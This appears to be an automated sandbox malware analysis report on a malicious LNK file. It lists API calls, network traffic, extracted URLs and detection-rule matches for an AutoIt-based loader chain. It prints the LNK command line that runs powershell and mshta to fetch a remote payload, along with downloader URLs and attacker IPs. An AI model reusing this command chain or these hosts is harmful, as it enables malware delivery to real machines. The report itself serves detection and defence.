Source: C:\Users\Public\Guard.exeCode function: 20_2_0071CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,20_2_0071CD9F
Source: C:\Users\Public\Guard.exeCode function: 20_2_0071F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,20_2_0071F5D8
Source: C:\Users\Public\Guard.exeCode function: 20_2_0071F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,20_2_0071F735
Source: C:\Users\Public\Guard.exeCode function: 20_2_0071FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,20_2_0071FA36
Source: C:\Users\Public\Guard.exeCode function: 20_2_00713CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,20_2_00713CE2
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_002F4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,24_2_002F4005
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_002F494A GetFileAttributesW,FindFirstFileW,FindClose,24_2_002F494A
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_002FC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,24_2_002FC2FF
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_002FCD14 FindFirstFileW,FindClose,24_2_002FCD14
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_002FCD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,24_2_002FCD9F
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_002FF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,24_2_002FF5D8
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_002FF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,24_2_002FF735
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_002FFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,24_2_002FFA36
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_002F3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,24_2_002F3CE2
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKetag: "108a00-675eb102-2534d;;;"last-modified: Sun, 15 Dec 2024 10:35:46 GMTcontent-type: application/x-executablecontent-length: 1083904accept-ranges: bytesdate: Wed, 18 Dec 2024 08:13:05 GMTserver: LiteSpeedconnection: Keep-Alive
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 18 Dec 2024 08:13:12 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30Last-Modified: Sun, 15 Dec 2024 10:29:42 GMTETag: "da2a8-6294c8abc9816"Accept-Ranges: bytesContent-Length: 893608Keep-Alive: timeout=5, max=100Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Marketing.pdf HTTP/1.1Host: tiffany-careers.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /PefjSkkhb.exe HTTP/1.1Host: tiffany-careers.com
Source: global trafficHTTP traffic detected: GET /QWCheljD.txt HTTP/1.1Host: 139.99.188.124Connection: Keep-Alive
Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
Source: Joe Sandbox ViewASN Name: FREE-NET-ASFREEnetEU FREE-NET-ASFREEnetEU
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49707 -> 147.45.49.155:80
Source: global trafficHTTP traffic detected: GET /ghep2 HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: tiffany-careers.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /kiiMf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 139.99.188.124Connection: Keep-Alive
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0EDE87C InternetReadFile,11_2_00007FF7C0EDE87C
Source: global trafficDNS traffic detected: DNS query: tiffany-careers.com
Source: global trafficDNS traffic detected: DNS query: x1.i.lencr.org
Source: global trafficDNS traffic detected: DNS query: nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs
Source: powershell.exe, 00000012.00000002.2304075109.00000130E1558000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2304075109.00000130E24AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://139.99.188.124
Source: powershell.exe, 00000012.00000002.2304075109.00000130E1558000.00000004.00000800.00020000.00000000.sdmp, PublicProfile.ps1.11.drString found in binary or memory: http://139.99.188.124/QWCheljD.txt
Source: PefjSkkhb.exe, 0000000B.00000002.2238572807.000001A112952000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://139.99.188.124/kiiMf
Source: powershell.exe, 00000012.00000002.2304075109.00000130E2959000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://139.99.H
Source: Guard.exe, 00000014.00000003.2314920403.00000000045BA000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000014.00000002.3293628451.0000000003841000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: Guard.exe, 00000014.00000003.2314920403.00000000045BA000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000014.00000002.3293628451.0000000003841000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: Guard.exe, 00000014.00000003.2314920403.00000000045BA000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000014.00000002.3293628451.0000000003841000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: Guard.exe, 00000014.00000003.2314920403.00000000045BA000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000014.00000002.3293628451.0000000003841000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: powershell.exe, 00000012.00000002.2302335696.00000130DF934000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft7
Source: mshta.exe, 00000004.00000002.2280512235.000001D0EC614000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2270176062.000001D0EC613000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2269204608.000001D0EC5FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.v
Source: svchost.exe, 00000005.00000002.3293299612.000001CFDD600000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
Source: 77EC63BDA74BD0D0E0426DC8F80085060.9.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: qmgr.db.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.5.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000006.00000002.2202478685.0000027015FB0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2304075109.00000130E2C37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2394092266.00000130F13A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: Guard.exe, 00000014.00000003.2314920403.00000000045BA000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000014.00000002.3293628451.0000000003841000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: Guard.exe, 00000014.00000003.2314920403.00000000045BA000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000014.00000002.3293628451.0000000003841000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: Guard.exe, 00000014.00000003.2314920403.00000000045BA000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000014.00000002.3293628451.0000000003841000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: powershell.exe, 00000012.00000002.2304075109.00000130E2BAE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2304075109.00000130E2989000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000006.00000002.2166249488.0000027005F41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2304075109.00000130E1331000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Guard.exe, 00000014.00000003.2314920403.00000000045BA000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000014.00000002.3293628451.0000000003841000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: Guard.exe, 00000014.00000003.2314920403.00000000045BA000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000014.00000002.3293628451.0000000003841000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: powershell.exe, 00000006.00000002.2166249488.000002700616A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tiffany-careers.com
Source: powershell.exe, 00000006.00000002.2166249488.000002700616A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tiffany-careers.com/Marketing.pdf0
Source: powershell.exe, 00000006.00000002.2166249488.00000270063DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tiffany-careers.com/PefjSkkhb.exep
Source: powershell.exe, 00000012.00000002.2304075109.00000130E2989000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000012.00000002.2304075109.00000130E2BAE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2304075109.00000130E2989000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: Guard.exe, 00000014.00000003.2314920403.00000000045BA000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000014.00000002.3290357798.0000000000779000.00000002.00000001.01000000.0000000E.sdmp, SwiftWrite.pif, 00000018.00000000.2426079955.0000000000359000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: powershell.exe, 00000006.00000002.2166249488.0000027005F41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2304075109.00000130E1331000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000012.00000002.2394092266.00000130F13A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000012.00000002.2394092266.00000130F13A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000012.00000002.2394092266.00000130F13A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: edb.log.5.drString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
Source: svchost.exe, 00000005.00000003.2082990781.000001CFDD410000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: powershell.exe, 00000012.00000002.2304075109.00000130E2BAE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2304075109.00000130E2989000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000012.00000002.2304075109.00000130E24AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: mshta.exe, 00000004.00000002.2280205979.000001D0EC5E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2276856139.000001D0EC5E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2269204608.000001D0EC5E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2273283593.000001D0EC5E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.comh
Source: powershell.exe, 00000006.00000002.2202478685.0000027015FB0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2304075109.00000130E2C37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2394092266.00000130F13A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: qmgr.db.5.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe/C:
Source: powershell.exe, 00000012.00000002.2304075109.00000130E2989000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
Source: powershell.exe, 00000012.00000002.2304075109.00000130E2989000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
Source: mshta.exe, 00000004.00000002.2280205979.000001D0EC5E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2276856139.000001D0EC5E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2269204608.000001D0EC5E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2273283593.000001D0EC5E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/
Source: mshta.exe, 00000004.00000003.2277213025.000001D0EC570000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2269204608.000001D0EC5FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2269906987.000001D8F2785000.00000004.00000020.00020000.00000000.sdmp, duyba.lnk.download.lnkString found in binary or memory: https://tiffany-careers.com/ghep2
Source: powershell.exeString found in binary or memory: https://tiffany-careers.com/ghep2$global:?
Source: mshta.exe, 00000004.00000002.2280075784.000001D0EC573000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2277213025.000001D0EC570000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/ghep2%
Source: mshta.exe, 00000004.00000003.2272974753.000001D8EE7AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2269552395.000001D8EE7AB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2273229589.000001D8EE7AF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2281088808.000001D8EE7AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/ghep2...
Source: forfiles.exe, 00000000.00000002.2049373136.0000019BECEE0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2280293129.000001D0EC5FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2279706602.000001D0EC530000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2273283593.000001D0EC5FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2276856139.000001D0EC5FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2269204608.000001D0EC5FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/ghep2C:
Source: mshta.exe, 00000004.00000002.2279297600.000001D0EC4C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/ghep2H
Source: mshta.exe, 00000004.00000002.2280000669.000001D0EC556000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2277367980.000001D0EC556000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/ghep2Q
Source: mshta.exe, 00000004.00000003.2270292666.000001D8F2785000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2269906987.000001D8F2785000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/ghep2d8
Source: mshta.exe, 00000004.00000003.2274189869.000001D8F2935000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/ghep2https://tiffany-careers.com/ghep2
Source: mshta.exe, 00000004.00000002.2279706602.000001D0EC538000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/ghep2l
Source: mshta.exe, 00000004.00000002.2280000669.000001D0EC556000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2277367980.000001D0EC556000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/ghep2o
Source: mshta.exe, 00000004.00000003.2269204608.000001D0EC5C5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2280174249.000001D0EC5C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/ghep2omQvj
Source: mshta.exe, 00000004.00000002.2280670724.000001D8EE70D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/ghep2s.LMEMHX
Source: mshta.exe, 00000004.00000002.2279706602.000001D0EC538000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/ghep2t
Source: mshta.exe, 00000004.00000002.2279706602.000001D0EC538000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2280000669.000001D0EC556000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2277367980.000001D0EC556000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/ghep2~
Source: Guard.exe, 00000014.00000003.2314920403.00000000045BA000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000014.00000002.3293628451.0000000003841000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/autoit3/
Source: Guard.exe, 00000014.00000002.3293628451.0000000003841000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
Source: Guard.exe, 00000014.00000003.2314920403.00000000045BA000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000014.00000002.3293628451.0000000003841000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/06
Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
Source: unknownHTTPS traffic detected: 147.45.49.155:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0EE0A6C OpenClipboard,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,11_2_00007FF7C0EE0A6C
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0EE0D24 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,11_2_00007FF7C0EE0D24
Source: C:\Users\Public\Guard.exeCode function: 20_2_00724830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,20_2_00724830
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_00304830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,24_2_00304830
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0EC8B38 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,11_2_00007FF7C0EC8B38
Source: C:\Users\Public\Guard.exeCode function: 20_2_0073D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,20_2_0073D164
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_0031D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,24_2_0031D164

System Summary

Source: Process Memory Space: powershell.exe PID: 4308, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: powershell.exe, 00000006.00000002.2202478685.00000270161B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_ce7ea808-4
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: This is a third-party compiled AutoIt script.11_2_00007FF7C0E537B0
Source: PefjSkkhb.exeString found in binary or memory: This is a third-party compiled AutoIt script.
Source: PefjSkkhb.exe, 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_07a4e04f-2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\PefjSkkhb.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Guard.exe
Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: duyba.lnk.download.lnkLNK file: /p C:\Windows\System32 /m cmmon32.exe /c "powershell . \*i*\*2\msh*e https://tiffany-careers.com/ghep2
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0ED3E20: GetFullPathNameW,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle,11_2_00007FF7C0ED3E20
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0EBCE68 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,11_2_00007FF7C0EBCE68
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0ECD750 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,11_2_00007FF7C0ECD750
Source: C:\Users\Public\Guard.exeCode function: 20_2_00715778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,20_2_00715778
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_002F5778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,24_2_002F5778
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: Joe Sandbox ViewDropped File: C:\Users\Public\Guard.exe D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: String function: 00007FF7C0E78D58 appears 76 times
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: String function: 002A1A36 appears 34 times
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: String function: 002B8B30 appears 42 times
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: String function: 002B0D17 appears 70 times
Source: C:\Users\Public\Guard.exeCode function: String function: 006D0D17 appears 70 times
Source: C:\Users\Public\Guard.exeCode function: String function: 006C1A36 appears 34 times
Source: C:\Users\Public\Guard.exeCode function: String function: 006D8B30 appears 42 times
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exeProcess created: Commandline size = 3023
Source: Process Memory Space: powershell.exe PID: 4308, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engineClassification label: mal100.expl.evad.winLNK@41/73@4/3
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0ED3778 GetLastError,FormatMessageW,11_2_00007FF7C0ED3778
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0EBCCE0 AdjustTokenPrivileges,CloseHandle,11_2_00007FF7C0EBCCE0
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0EBD5CC LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,11_2_00007FF7C0EBD5CC
Source: C:\Users\Public\Guard.exeCode function: 20_2_00708DE9 AdjustTokenPrivileges,CloseHandle,20_2_00708DE9
